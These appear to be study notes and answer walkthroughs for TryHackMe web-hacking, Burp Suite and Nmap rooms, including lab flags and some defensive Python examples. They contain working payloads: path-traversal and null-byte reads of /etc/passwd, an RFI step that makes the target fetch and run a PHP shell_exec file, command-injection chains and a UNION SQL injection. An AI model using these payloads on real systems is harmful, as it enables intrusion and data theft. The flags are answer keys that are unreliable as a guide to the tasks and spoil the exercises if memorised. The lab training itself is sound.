Introduction to Pentesting


Fundamentals

The steps a penetration tester takes during an engagement are known as the methodology. The stages generally used in the methodology are:

  1. Information Gathering
  2. Enumeration/Scanning
  3. Exploitation
  4. Privilege Escalation
  5. Post-Exploitation

There are many open-source databases, like AbuseIPDB and Cisco Talos Intelligence, where you can perform a reputation and location check on an IP address.

Frameworks like the Open Source Security Testing Methodology (OSSTMM) and the Open Web Application Security Project (OWASP) are good frameworks to follow for testing. Others include the NIST Cybersecurity Framework 1.1 and the NCSC Cyber Assessment Framework (CAF).

There are 3 scopes for testing an application, depending on how much you know about the target: Black-Box, Grey-Box and White-Box testing.

The CIA Triad is a security model to keep in mind throughout the creation of a security policy. CIA stands for Confidentiality, Integrity and Availability.


Introduction to Web Hacking


Walking An Application

After starting the machine and connecting with the VPN configuration provided, we can start solving these challenges.

Viewing The Page Source

  1. The HTML comment at the top of the homepage's page source mentions /new-home-beta; go to that address

    https://IP.p.thmlabs.com/new-home-beta
    THM{HTML_COMMENTS_ARE_DANGEROUS}
    
  2. On the /secret-page address you will find the next flag

    https://IP.p.thmlabs.com/secret-page
    THM{NOT_A_SECRET_ANYMORE}
    
  3. Visiting the /assets address shows a directory listing, which includes a flag.txt

    https://IP.p.thmlabs.com/assets/flag.txt
    THM{INVALID_DIRECTORY_PERMISSIONS}
    
  4. On the https://static-labs.tryhackme.cloud/sites/thm-web-framework website, the changelog for version 1.3 mentions that a file tmp.zip is accessible to users. Download it from the /tmp.zip address; the flag is inside.

    https://IP.p.thmlabs.com/tmp.zip
    THM{KEEP_YOUR_SOFTWARE_UPDATED}
    

Developer Tools - Inspector

Go to the premium article on the news webpage, right-click the paywall and select Inspect. Right-click the premium-customer-blocker div and select Delete Node. The flag will be visible now.

THM{NOT_SO_HIDDEN}

Developer Tools - Debugger

Go to the Contact page and put a breakpoint on the flash['remove'] line in the debugger. You can see the flag written there.


Developer Tools - Network

Go to Contact Page and send a message with the network tab open. After sending the message select the contact-msg event in the Network Tab. The flag is in the AJAX Response to the request.

THM{GOT_AJAX_FLAG}

Content Discovery

What is Content Discovery?

What is the Content Discovery method that begins with M?

Manually

What is the Content Discovery method that begins with A?

Automated

What is the Content Discovery method that begins with O?

OSINT

Manual Discovery

What is the directory in the robots.txt that isn’t allowed to be viewed by web crawlers?

Go to the /robots.txt address and check the Disallow entry:

/staff-portal

Manual Discovery - Favicon

What framework did the favicon belong to?

Go to the mentioned website, https://static-labs.tryhackme.cloud/sites/favicon/, view the page source and find the favicon.ico file. Copy the web address of the icon path and run it through curl:

curl https://static-labs.tryhackme.cloud/sites/favicon/images/favicon.ico | md5sum

I got the MD5 hash ‘f276b19aabcb4ae8cda4d22625c6735f’. We will cross-check it with the OWASP database. The framework is:

cgiirc

Manual Discovery - Sitemap.xml

What is the path of the secret area that can be found in the sitemap.xml file?

/s3cr3t-area

Manual Discovery - HTTP Headers

What is the flag value from the X-FLAG header?

Run curl with the -v flag.

THM{HEADER_FLAG}

Manual Discovery - Framework Stack

Go to the documentation page. As mentioned there, go to http://IP/thm-framework-login

THM{CHANGE_DEFAULT_CREDENTIALS}

OSINT - Google Hacking / Dorking

What Google dork operator can be used to only show results from a particular site?

site:

OSINT - Wappalyzer

What online tool can be used to identify what technologies a website is running?

wappalyzer

OSINT - Wayback Machine

What is the website address for the Wayback Machine?

https://archive.org/web/

OSINT - GitHub

What is Git?

version control system

OSINT - S3 Buckets

What URL format do Amazon S3 buckets end in?

.s3.amazonaws.com

Automated Discovery

Run the dirb command with a wordlist:

dirb http://10.10.142.122/ /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt


Subdomain Enumeration

Three different subdomain enumeration methods: Brute Force, OSINT (Open-Source Intelligence) and Virtual Host.

What is a subdomain enumeration method beginning with B?

Brute Force

What is a subdomain enumeration method beginning with O?

OSINT

What is a subdomain enumeration method beginning with V?

Virtual Host

OSINT - SSL/TLS Certificates

To discover subdomains using Certificate Transparency logs we can use sites like http://crt.sh/ and https://ui.ctsearch.entrust.com/ui/ctsearchui

What domain was logged on crt.sh at 2020-12-26?

store.tryhackme.com

OSINT - Search Engines

"-site:www.domain.com site:*.domain.com" would only return results for the domain name domain.com but exclude any links to www.domain.com; therefore, it shows us only subdomain names belonging to domain.com.

What is the TryHackMe subdomain beginning with B discovered using the above Google search?

blog.tryhackme.com

DNS Bruteforce

What is the first subdomain found with the dnsrecon tool?

api.acmeitsupport.thm

OSINT - Sublist3r

What is the first subdomain discovered by sublist3r?

web55.acmeitsupport.thm

Virtual Hosts

Because web servers can host multiple websites on one server, when a client requests a website the server works out which one it wants from the Host header. We can take advantage of this by changing the Host header and monitoring the response to see if we’ve discovered a new website.

What is the first subdomain discovered?

delta

What is the second subdomain discovered?

yellow


Authentication Bypass

Username Enumeration

What is the username starting with si*** ?

simon

What is the username starting with st*** ?

steve

What is the username starting with ro**** ?

robert

Brute Force

What is the valid username and password (format: username/password)?

steve/thunder

Logic Flaw

Create a user account on the acme support registration page and run the curl commands. Once you receive the password reset token, go to that webpage and visit the Support Tokens. The flag should be there.

THM{AUTH_BYPASS_COMPLETE} 

What is the flag from changing the plain text cookie values?

THM{COOKIE_TAMPERING}

What is the value of the md5 hash 3b2a1053e3270077456a79192070aa78 ?

Go to https://crackstation.net/ and put in the value

463729

What is the base64 decoded value of VEhNe0JBU0U2NF9FTkNPRElOR30= ?

THM{BASE64_ENCODING}

Encode the following value using base64: {"id":1,"admin":true}

eyJpZCI6MSwiYWRtaW4iOnRydWV9Cg==

IDOR

IDOR stands for Insecure Direct Object Reference

An IDOR Example

Change the order ID from 1234 to 1000 on the order invoice web address

THM{IDOR-VULN-FOUND}

Finding IDORs in Encoded IDs

What is a common type of encoding used by websites?

base64

Finding IDORs in Hashed IDs

What is a common algorithm used for hashing IDs?

md5

Finding IDORs in Unpredictable IDs

What is the minimum number of accounts you need to create to check for IDORs between accounts?

2

A Practical IDOR Example

What is the username for user id 1?

adam84

What is the email address for user id 3?

j@fakemail.thm


File Inclusion

Path Traversal

What function causes path traversal vulnerabilities in PHP?

file_get_contents

Local File Inclusion - LFI

Give Lab #1 a try to read /etc/passwd. What would the request URI be?

/lab1.php?file=/etc/passwd

In Lab #2, what is the directory specified in the include function?

includes

Local File Inclusion - LFI#2

It seems we could move out of the PHP directory, but the include function still reads the input with .php appended at the end. This tells us that the developer appends the file type before passing the value to the include function. To bypass this scenario, we can use the NULL BYTE, which is %00.

NOTE: the %00 trick was fixed in PHP 5.3.4 and does not work on that version or later.

To bypass filtering of sensitive file names, the NULL BYTE or the current directory trick can be used - http://webapp.thm/index.php?lang=/etc/passwd/.

Give Lab #3 a try to read /etc/passwd. What does the request look like?

Enter it directly in the address bar, since the input form URL-encodes it.

lab3.php?file=../../../../../etc/passwd%00

Which function is causing the directory traversal in Lab #4?

file_get_contents

For Lab 5 - lab5.php?file=....//....//....//....//etc/passwd

Try out Lab #6. Which directory has to be in the input field?

THM-profile

Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?

file=THM-profile/../../../../etc/os-release
12.04
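The labs above all come down to how the application turns the file parameter into a path. The following is an added example written for these notes, not code from the TryHackMe room or its labs: it shows the single-pass "../" filter that lab 5 gets past, beside a hardened include resolver that closes the null-byte, traversal and current-directory tricks discussed above. BASE_DIR, the function names and the sample inputs are this example's own assumptions; the THM-profile directory name is the one the lab 6 text requires.

```python
"""Added example, not code from the TryHackMe room or its labs: a weak one-pass
'../' filter beside a hardened include resolver. BASE_DIR, the function names
and the sample inputs are assumptions made for this example."""
import posixpath

BASE_DIR = "/var/www/includes"        # constructed document root for the example
REQUIRED_PREFIX = "THM-profile"       # lab 6 insists the parameter starts here


def naive_filter(user_input: str) -> str:
    """The weak filter lab 5 gets past: remove '../' exactly once.
    '....//' loses its middle '../' and collapses back into '../'."""
    return user_input.replace("../", "")


def naive_resolve(user_input: str) -> str:
    """Vulnerable resolver: filter once, append '.php', join without checking
    where the normalised path ends up."""
    return posixpath.normpath(posixpath.join(BASE_DIR, naive_filter(user_input) + ".php"))


def escapes_base(path: str) -> bool:
    """True when a resolved path lies outside BASE_DIR."""
    return not path.startswith(BASE_DIR + "/")


def safe_resolve(user_input: str) -> str:
    """Hardened resolver. Refuses null bytes (the %00 truncation trick), absolute
    paths such as '/etc/passwd/.', and any normalised path that leaves
    BASE_DIR/REQUIRED_PREFIX."""
    if "\x00" in user_input:
        raise ValueError("null byte in file name")
    if user_input.startswith("/"):
        raise ValueError("absolute paths are not allowed")
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, user_input + ".php"))
    allowed_root = posixpath.join(BASE_DIR, REQUIRED_PREFIX)
    # normpath has already collapsed every '..' and '/.', so a prefix test is sound
    if not candidate.startswith(allowed_root + "/"):
        raise ValueError("path escapes the allowed directory")
    return candidate


def is_allowed(user_input: str) -> bool:
    """Convenience wrapper: does safe_resolve accept this input?"""
    try:
        safe_resolve(user_input)
        return True
    except ValueError:
        return False
```

The check is done on the normalised path rather than on the raw string, which is why stripping "../" (once or repeatedly) is never enough: whatever the input looks like, the only question that matters is where the final path lands.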

Remote File Inclusion - RFI

One requirement for RFI is that the allow_url_fopen option needs to be on.

The risk of RFI is higher than LFI since RFI vulnerabilities allow an attacker to gain Remote Command Execution (RCE) on the server.

Challenge

Capture Flag1 at /etc/flag1

curl -d "file=../../../etc/flag1" -X POST http://IP/challenges/chall1.php
F1x3d-iNpu7-f0rrn

Capture Flag2 at /etc/flag2

Change the cookie from Guest to '../../../../etc/flag2%00'
c00k13_i5_yuMmy1

Capture Flag3 at /etc/flag3

curl -d "file=../../../etc/flag3%00" -X POST http://IP/challenges/chall3.php --output -
P0st_1s_w0rk1in9

Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?

Create a hostnames.php file on your machine with the code

<?php echo shell_exec("hostname");?>

Then start a python simple HTTP server with

python3 -m http.server 80
# Then on the playground use http://InternalTHMIPAddress:80/hostnames.php
lfi-vm-thm-f8c5b1a78692

SSRF

SSRF stands for Server-Side Request Forgery. It is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

There are 2 types: Blind SSRF (no information is returned) and Regular SSRF (information is returned).

SSRF Examples


What is the flag from the SSRF Examples site?

https://website.thm/item/2?server=server.website.thm/flag?id=9&x=
THM{SSRF_MASTER}

Finding an SSRF

Places to find SSRF:

  1. Full URL in the address bar
  2. Hidden values in the form
  3. Partial URL
  4. Only the path of the URL

What website can be used to catch HTTP requests from a server?

requestbin.com

Defeating Common SSRF Defenses

What method can be used to bypass strict rules?

open redirect

What IP address may contain sensitive data in a cloud environment?

169.254.169.254

What type of list is used to permit only certain input?

allow list

What type of list is used to stop certain input?

deny list
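The allow list versus deny list questions above are the crux of SSRF defence. The following is an added example for these notes, not code from the room: a deny-list check that only knows about literal internal addresses, beside an allow-list validator that permits nothing but the expected destination. The allowed host and the sample URLs are constructed for the example; 169.254.169.254 is the cloud metadata address from the question above.

```python
"""Added example, not the room's own code: deny-list versus allow-list URL checks
that a server-side fetcher would run before making a request. ALLOWED_HOSTS
and the sample URLs are assumptions made for this example."""
import ipaddress
from urllib.parse import urlsplit

# Constructed allow list: the only host the application legitimately fetches from.
ALLOWED_HOSTS = {"server.website.thm"}
ALLOWED_SCHEMES = {"http", "https"}


def is_internal_address(host: str) -> bool:
    """Deny-list check on literal IPs: private, loopback or link-local ranges.
    169.254.0.0/16 is link-local and contains the metadata service address."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # a hostname, not a literal IP: a deny list cannot judge it here
    return addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_reserved


def deny_list_allows(url: str) -> bool:
    """Blocks known-bad literal addresses only. A hostname that resolves to the
    same address, an alternate IP encoding or an open redirect all slip past."""
    parts = urlsplit(url)
    return parts.scheme in ALLOWED_SCHEMES and not is_internal_address(parts.hostname or "")


def allow_list_allows(url: str) -> bool:
    """Permits only exact, expected destinations: known scheme, known host, no
    embedded credentials, no non-default port. Everything else is refused."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False
    if parts.username or parts.password:
        return False  # 'http://server.website.thm@other-host/' style confusion
    if parts.port is not None:
        return False
    return (parts.hostname or "").lower() in ALLOWED_HOSTS
```

The deny list passes a hostname it has never heard of even when that name points at an internal address, which is exactly the gap an open redirect exploits; the allow list has no such gap because it never has to reason about what a request might become.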

SSRF Practical

What is the flag from the /private directory?

THM{YOU_WORKED_OUT_THE_SSRF}

Cross-Site Scripting

XSS Payloads

Which document property could contain the user’s session token?

document.cookie

Which JavaScript method is often used as a Proof Of Concept?

alert

Reflected XSS

Where in an URL is a good place to test for reflected XSS?

parameter

Stored XSS

How are stored XSS payloads usually stored on a website?

database

DOM Based XSS

What unsafe JavaScript method is good to look for in source code?

eval()

Blind XSS

What tool can you use to test for Blind XSS?

xsshunter

What type of XSS is very similar to Blind XSS?

stored xss

Perfecting your payload

An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one.

What is the flag you received from level six?

THM{XSS_MASTER}

Practical Example (Blind XSS)

What is the value of the staff-session cookie?

4AB305E55955197693F01D6F8FD2D321

Command Injection

Discovering Command Injection

What variable stores the user’s input in the PHP code snippet in this task?

$title

What HTTP method is used to retrieve data submitted by a user in the PHP code snippet?

GET

If I wanted to execute the id command in the Python code snippet, what route would I need to visit?

/id

Exploiting Command Injection

What payload would I use if I wanted to determine what user the application is running as?

whoami

What popular network tool would I use to test for blind command injection on a Linux machine?

ping

What payload would I use to test a Windows machine for blind command injection?

timeout

Remediating Command Injection

What is the term for the process of “cleaning” user input that is provided to an application?

sanitisation
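To make the remediation concrete, here is an added example written for these notes, not the room's own Python snippet: the string-built shell command that makes a ping utility injectable, beside a hardened version that validates the input as an IP address and never hands it to a shell. The function names are this example's own; the payload strings echo the room's practical task.

```python
"""Added example, not the room's code: a vulnerable string-built command beside a
hardened argument-vector version. Function names are this example's own."""
import ipaddress
import subprocess


def vulnerable_command(host: str) -> str:
    """The injectable pattern: the input is concatenated into a shell string, so
    '&&', ';' and '|' in it become shell operators when run via os.system()."""
    return "ping -c 1 " + host


def is_valid_host(host: str) -> bool:
    """Validation step: accept only a literal IPv4/IPv6 address, nothing else."""
    try:
        ipaddress.ip_address(host.strip())
        return True
    except ValueError:
        return False


def build_ping_argv(host: str) -> list:
    """Hardened: validate, then return an argument vector that subprocess will
    exec directly. With no shell in the path, metacharacters are just bytes."""
    if not is_valid_host(host):
        raise ValueError(f"not an IP address: {host!r}")
    return ["ping", "-c", "1", str(ipaddress.ip_address(host.strip()))]


def run_ping(host: str) -> int:
    """Runs the validated command (shell=False is the default); returns the exit status."""
    return subprocess.run(build_ping_argv(host), capture_output=True, timeout=5).returncode
```

Two independent fixes are at work: the allow-list validation rejects anything that is not an address, and the argument vector means that even a value which slipped past validation could not start a second command.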

Practical: Command Injection (Deploy)

What user is this application running as?

127.0.0.1 && whoami
www-data

What are the contents of the flag located in /home/tryhackme/flag.txt?

127.0.0.1 && cat /home/tryhackme/flag.txt
THM{COMMAND_INJECTION_COMPLETE}

SQL Injection

What does SQL stand for?

structured query language

What is a Database?

What is the acronym for the software that controls a database?

dbms

What is the name of the grid-like structure which holds the data?

table

What is SQL?

What SQL statement is used to retrieve data?

select

What SQL clause can be used to retrieve data from multiple tables?

union

What SQL statement is used to add data?

insert

What is SQL Injection

What character signifies the end of an SQL query?

;

In-Band SQLi

What is the flag after completing level 1?

THM{SQL_INJECTION_3840}

Blind SQLi - Authentication Bypass

What is the flag after completing level two? (and moving to level 3)

THM{SQL_INJECTION_9581}

Blind SQLi - Boolean Based

What is the flag after completing level three?

THM{SQL_INJECTION_1093}

Blind SQLi - Time Based

What is the final flag after completing level four?

THM{SQL_INJECTION_MASTER}

Out-of-Band SQLi

Name a protocol beginning with D that can be used to exfiltrate data from a database.

DNS

Remediation

Name a method of protecting yourself from an SQL Injection exploit.

prepared statement

Burp Suite


What is Burp Suite?

Which edition of Burp Suite will we be using in this module?

burp suite community

Which edition of Burp Suite runs on a server and provides constant scanning for target web apps?

burp suite enterprise

Burp Suite is frequently used when attacking web applications and ______ applications.

mobile

Features of Burpsuite

Which Burp Suite feature allows us to intercept requests between ourselves and the target?

proxy

Which Burp tool would we use if we wanted to bruteforce a login form?

intruder

Options

In which Project options sub-tab can you find reference to a “Cookie jar”?

sessions

In which User options sub-tab can you change the Burp Suite update behaviour?

misc

What is the name of the section within the User options “Misc” sub-tab which allows you to change the Burp Suite keybindings?

hotkeys

If we have uploaded Client-Side TLS certificates in the User options tab, can we override these on a per-project basis (Aye/Nay)?

aye

There are many more configuration options available. Take the time to read through them.

In the next section, we will cover the Burp Proxy – a much more hands-on aspect of the room.

Introduction to the Burp Proxy

Which button would we choose to send an intercepted request to the target in Burp Proxy?

forward

[Research] What is the default keybind for this?

ctrl+f

Connecting through the Proxy (FoxyProxy)

There is one particularly useful option that allows you to intercept and modify the response to your request.

What is this option?

response to this request

Site Map and Issue Definitions

Take a look around the site on http://10.10.166.98/ – we will be using this a lot throughout the module. Visit every page linked to from the homepage, then check your sitemap – one endpoint should stand out as being very unusual!

Visit this in your browser (or use the “Response” section of the site map entry for that endpoint). What is the flag you receive?

Click around on the homepage and then check the site map.


THM{NmNlZTliNGE1MWU1ZTQzMzgzNmFiNWVk}

Look through the Issue Definitions list. What is the typical severity of a Vulnerable JavaScript dependency?

low

Burp Suite: Repeater

Repeater Views

Which view option displays the response in the same format as your browser would?

render

Practical Example

Send the request. What is the flag you receive?

THM{Yzg2MWI2ZDhlYzdlNGFiZTUzZTIzMzVi}

Practical Challenge

What is the flag you receive when you cause a 500 error in the endpoint?

Pass -1 as the product number in the request:

GET /products/-1 HTTP/1.1
THM{N2MzMzFhMTA1MmZiYjA2YWQ4M2ZmMzhl}

SQLi with Repeater

Exploit the union SQL injection vulnerability in the site.

What is the flag?

Path - /about/0 UNION ALL SELECT notes,null,null,null,null from people where id ="1"
THM{ZGE3OTUyZGMyMzkwNjJmZjg3Mzk1NjJh} None

Burp Suite: Intruder

What is Intruder?

Which section of the Options sub-tab allows you to control what information will be captured in the Intruder results?

attack results

In which Intruder sub-tab can we define the “Attack type” for our planned attack?

positions

Attack Types - Sniper

If you were using Sniper to fuzz three parameters in a request, with a wordlist containing 100 words, how many requests would Burp Suite need to send to complete the attack?

requests = numberOfWords * numberOfPositions (100 * 3)

300

How many sets of payloads will Sniper accept for conducting an attack?

1

Sniper is good for attacks where we are only attacking a single parameter, aye or nay?

aye

Attack Types - Battering Ram

What would the body parameters of the first request that Burp Suite sends be?

username=admin&password=admin

Attack Type - Pitchfork

Like running multiple Sniper attacks at once, each with its own payload set.

What is the maximum number of payload sets we can load into Intruder in Pitchfork mode?

20

Attack Types - Cluster Bomb

We have three payload sets. The first set contains 100 lines; the second contains 2 lines; and the third contains 30 lines.

How many requests will Intruder make using these payload sets in a Cluster Bomb attack?

Requests = 100 * 2 * 30
6000

Intruder - Payloads

Which payload type lets us load a list of words into a payload set?

simple list

Which Payload Processing rule could we use to add characters at the end of each payload in the set?

add suffix

Practical - Challenge

Which attack type is best suited for this task?

sniper

Configure an appropriate position and payload (the tickets are stored at values between 1 and 100), then start the attack.

Either using the Response tab in the Attack Results window or by looking at each successful (i.e. 200 code) request manually in your browser, find the ticket that contains the flag.

What is the flag?

Ticket 83 has the flag
THM{MTMxNTg5NTUzMWM0OWRlYzUzMDVjMzJl}


Burp Suite: Other Modules

Decoder - Encoding/Decoding

Base64 encode the phrase: Let's Start Simple. What is the base64 encoded version of this text?

TGV0J3MgU3RhcnQgU2ltcGxl

URL Decode this data: %4e%65%78%74%3a%20%44%65%63%6f%64%69%6e%67.

Next: Decoding

Use Smart Decode to decode this data: &#x25;&#x33;&#x34;&#x25;&#x33;&#x37;.

47

Encode this phrase: Encoding Challenge.

Start with base64 encoding. Take the output of this and convert it into ASCII Hex. Finally, encode the hex string into octal.

24034214a720270024142d541357471232250253552c1162d1206c

Decoder - Hashing

Using Decoder, what is the SHA-256 hashsum of the phrase: Let's get Hashing!?

Convert this into an ASCII Hex string for the answer to this question.

6b72350e719a8ef5af560830164b13596cb582757437e21d1879502072238abe

Generate an MD4 hashsum of the phrase: Insecure Algorithms.

Encode this as base64 (not ASCII Hex) before submitting.

TcV4QGZZN7y7lwYFRMMoeA==

“Some joker has messed with my SSH key! There are four keys in the directory, and I have no idea which is the real one. The MD5 hashsum for my key is 3166226048d6ad776370dc105d40d9f8 – could you find it for me?”

Submit the correct key name as your answer.

key3



Network Security


Passive Reconnaissance

Passive Versus Active Recon

You visit the Facebook page of the target company, hoping to get some of their employee names. What kind of reconnaissance activity is this?

p

You ping the IP address of the company webserver to check if ICMP traffic is blocked. What kind of reconnaissance activity is this?

a

You happen to meet the IT administrator of the target company at a party. You try to use social engineering to get more information about their systems and network infrastructure. What kind of reconnaissance activity is this?

a

whois

When was TryHackMe.com registered?

20180705

What is the registrar of TryHackMe.com?

namecheap.com

Which company is TryHackMe.com using for name servers?

cloudflare.com

nslookup and dig

Check the TXT records of thmlabs.com. What is the flag there?

THM{a5b83929888ed36acb0272971e438d78}

DNSDumpster

Lookup tryhackme.com on DNSDumpster. What is one interesting subdomain that you would discover in addition to www and blog?

remote

Shodan.io

According to Shodan.io, what is the 2nd country in the world in terms of the number of publicly accessible Apache servers?

Search for Apache on Shodan

germany

Based on Shodan.io, what is the 3rd most common port used for Apache?

8080

Based on Shodan.io, what is the 3rd most common port used for nginx?

8888

Active Reconnaissance

Web Browser

Browse to the following website and ensure that you have opened your Developer Tools on AttackBox Firefox, or the browser on your computer. Using the Developer Tools, figure out the total number of questions.

Inspect the page and go to script.js in sources.

8

Ping

Which option would you use to set the size of the data carried by the ICMP echo request?

-s

What is the size of the ICMP header in bytes?

8

Does MS Windows Firewall block ping by default? (Y/N)

y

Deploy the VM for this task and using the AttackBox terminal, issue the command ping -c 10 10.10.254.202. How many ping replies did you get back?

10

Traceroute

In Traceroute A, what is the IP address of the last router/hop before reaching tryhackme.com?

172.67.69.208

In Traceroute B, what is the IP address of the last router/hop before reaching tryhackme.com?

104.26.11.229

In Traceroute B, how many routers are between the two systems?

26

Telnet

Start the attached VM from Task 3 if it is not already started. On the AttackBox, open the terminal and use the telnet client to connect to the VM on port 80. What is the name of the running server?

apache

What is the version of the running server (on port 80 of the VM)?

2.4.10

Netcat

Start the VM and open the AttackBox. Once the AttackBox loads, use Netcat to connect to the VM port 21. What is the version of the running server?

0.17

Nmap Live Host Discovery

Subnetworks

How many devices can see the ARP Request?

(2 devices, 1 switch and 1 router)

4

Did computer6 receive the ARP Request? (Y/N)

N

From: Computer4 → Computer4

How many devices can see the ARP Request?

4

Did computer6 reply to the ARP Request? (Y/N)

Y

Enumerating Targets

What is the first IP address Nmap would scan if you provided 10.10.12.13/29  as your target?

10.10.12.13 in binary is 00001010.00001010.00001100.00001|101; the 29 bits before the bar are fixed by the prefix.

Only the last 3 bits can change, so the first address has them set to 000, which gives 10.10.12.8.

10.10.12.8

How many IP addresses will Nmap scan if you provide the following range 10.10.0-255.101-125?

6400
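The two questions above are instances of one calculation: clear the host bits of a CIDR target, or multiply the sizes of the octet ranges of a range target. The following is an added example for these notes, not part of the TryHackMe room: it performs both, and also enumerates the concrete addresses a range target expands to. The function names and helper logic are this example's own; the inputs are the ones from the questions.

```python
"""Added example, not part of the room: CIDR first-address and octet-range
address counting for Nmap target specifications. Function names are this
example's own."""
import ipaddress
from itertools import product


def first_address(cidr: str) -> str:
    """First address of a CIDR block: clear the host bits after the prefix.
    strict=False lets ipaddress do the masking the binary walk above does by hand."""
    network = ipaddress.ip_network(cidr, strict=False)
    return str(network.network_address)


def host_bits(cidr: str) -> int:
    """How many low bits are free to change: 32 minus the prefix length."""
    return 32 - ipaddress.ip_network(cidr, strict=False).prefixlen


def _expand_octet(part: str) -> range:
    """'0-255' -> range(0, 256); '101' -> range(101, 102). Rejects values outside 0..255."""
    lo, _, hi = part.partition("-")
    lo_i = int(lo)
    hi_i = int(hi) if hi else lo_i
    if not (0 <= lo_i <= hi_i <= 255):
        raise ValueError(f"bad octet range: {part}")
    return range(lo_i, hi_i + 1)


def range_target_count(target: str) -> int:
    """Number of addresses in an octet-range target such as 10.10.0-255.101-125:
    the product of the sizes of the four octet ranges."""
    octets = target.split(".")
    if len(octets) != 4:
        raise ValueError("expected four dotted octets")
    count = 1
    for part in octets:
        count *= len(_expand_octet(part))
    return count


def expand_range_target(target: str, limit: int = 10) -> list:
    """The first `limit` concrete addresses of an octet-range target, in the order
    this example enumerates them (last octet varying fastest)."""
    ranges = [_expand_octet(p) for p in target.split(".")]
    out = []
    for combo in product(*ranges):
        out.append(".".join(str(o) for o in combo))
        if len(out) >= limit:
            break
    return out
```

A /29 leaves 3 host bits, so the block holds 8 addresses starting at the one with those bits cleared; the range target multiplies 1 × 1 × 256 × 25.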

Discovering Live Hosts

What is the type of packet that computer1 sent before the ping?

arp request

What is the type of packet that computer1 received before being able to send the ping?

arp response

How many computers responded to the ping request?

1

What is the name of the first device that responded to the first ARP  Request?

router

What is the name of the first device that responded to the second ARP Request?

computer5

Send another Ping Request. Did it require new ARP Requests? (Y/N)

No, because the router already stored the MAC and IP address of computer5 during the first request.

N

Nmap Host Discovery Using ARP

We run nmap -PR -sn MACHINE_IP/24 to discover all the live systems on the same subnet as our target machine.

How many devices are you able to discover using ARP requests?

Only the 3 that are in the same subnet

3

Nmap Host Discovery Using ICMP

In an attempt to discover live hosts using ICMP address mask queries, we run the command nmap -PM -sn MACHINE_IP/24.

Nmap uses timestamp request (ICMP Type 13) and checks whether it will get a Timestamp reply (ICMP Type 14). Adding the -PP option tells Nmap to use ICMP timestamp requests.

nmap -PP -sn MACHINE_IP/24

In the example below, we scanned the target’s subnet using nmap -PE -sn MACHINE_IP/24. This scan sends ICMP echo packets to every IP address on the subnet. Again, we expect live hosts to reply.

What is the option required to tell Nmap to use ICMP Timestamp to discover live hosts?

-PP

What is the option required to tell Nmap to use ICMP Address Mask to discover live hosts?

-PM

What is the option required to tell Nmap to use ICMP Echo to discover live hosts?

-PE

Nmap Host Discovery Using TCP and UDP

TCP SYN Ping (-PS): nmap -PS<PORTNUMBER> -sn MACHINE_IP/24

TCP ACK Ping (-PA): sudo nmap -PA -sn MACHINE_IP/24

UDP Ping (-PU): sudo nmap -PU -sn MACHINE_IP/24

Which TCP ping scan does not require a privileged account?

TCP SYN Ping

Which TCP ping scan requires a privileged account?

TCP ACK Ping

What option do you need to add to Nmap to run a TCP SYN ping scan on the telnet port?

Telnet works on port 23

-PS23

Use Reverse-DNS Lookup

We want Nmap to issue a reverse DNS lookup for all the possible hosts on a subnet, hoping to get some insights from the names. What option should we add?

-R

Nmap Basic Port Scans

TCP and UDP Ports

Which service uses UDP port 53 by default?

DNS

Which service uses TCP port 22 by default?

SSH

How many port states does Nmap consider?

6

Which port state is the most interesting to discover as a pentester?

open

TCP Flags

What 3 letters represent the Reset flag?

RST

Which flag needs to be set when you initiate a TCP connection (first packet of TCP 3-way handshake)?

SYN

TCP Connect Scan

-sT (TCP Connect Scan)

-F for fast scan mode

Launch the VM. Open the AttackBox and execute nmap -sT 10.10.99.196 via the terminal. A new service has been installed on this VM since our last scan. Which port number was closed in the scan above but is now open on this target VM?

110

What is Nmap’s guess about the newly installed service?

pop3

TCP SYN Scan

-sS TCP SYN Scan for Ports

Launch the VM. Some new server software has been installed since the last time we scanned it. On the AttackBox, use the terminal to execute nmap -sS 10.10.48.80 . What is the new open port?

6667

What is Nmap’s guess of the service name?

irc

UDP Scan

-sU for UDP Scan

Launch the VM. On the AttackBox, use the terminal to execute nmap -sU -F -v 10.10.97.0. A new service has been installed since the last scan. What is the UDP port that is now open?

53

What is the service name according to Nmap?

domain

Fine-Tuning Scope and Performance

What is the option to scan all the TCP ports between 5000 and 5500?

-p5000-5500

How can you ensure that Nmap will run at least 64 probes in parallel?

--min-parallelism 64

What option would you add to make Nmap very slow and paranoid?

-T0

Nmap Post Port Scans

Server Detection

What is the detected version for port 143?

Dovecot imapd

Which service did not have a version detected with --version-light?

rpcbind

OS Detection and Traceroute

What OS did Nmap detect?

linux

Nmap Scripting Engine (NSE)

Nmap scripts are saved in /usr/share/nmap/scripts on the AttackBox. What does the script http-robots.txt check for?

disallowed entries

Can you figure out the name of the script that checks for the remote code execution vulnerability MS15-034 (CVE-2015-1635)?

http-vuln-cve2015-1635

Run Nmap with the default scripts -sC against IP. You will notice that there is a service listening on port 53. What is its full version value?

9.9.5-9+deb8u19-Debian

What is the name of the key exchange algorithms (kex_algorithms) that relies upon “sha1” and is supported by IP?

diffie-hellman-group14-sha1

Saving the Output

Check the attached Nmap logs. How many systems are listening on the HTTPS port?

I used the command:

grep -c 443 scan_172_17_network.gnmap
3

What is the IP address of the system listening on port 8089?

grep 8089 scan_172_17_network.gnmap
172.17.20.147

Protocols and Servers

Telnet

To which port will the telnet command with the default parameters try to connect?

23

Hyper Text Transfer Protocol (HTTP)

Launch the attached VM. From the AttackBox terminal, connect using Telnet to 10.10.33.125 80 and retrieve the file flag.thm. What does it contain?


THM{e3eb0a1df437f3f97a64aca5952c8ea0}

File Transfer Protocol (FTP)

Using an FTP client, connect to the VM and try to recover the flag file. What is the flag?

THM{364db6ad0e3ddfe7bf0b1870fb06fbdf}

Simple Mail Transfer Protocol (SMTP)

Using the AttackBox terminal, connect to the SMTP port of the target VM. What is the flag that you can get?

THM{5b31ddfc0c11d81eba776e983c35e9b5}

Post Office Protocol 3 (POP3)

Connect to the VM at the POP3 port. Authenticate using the username frank and password D2xc9CgD. What is the response you get to STAT?

+OK 0 0

How many email messages are available to download via POP3 on ?

0

Internet Message Access Protocol (IMAP)

What is the default port used by IMAP?

143

Protocols and Server 2

Sniffing Attack

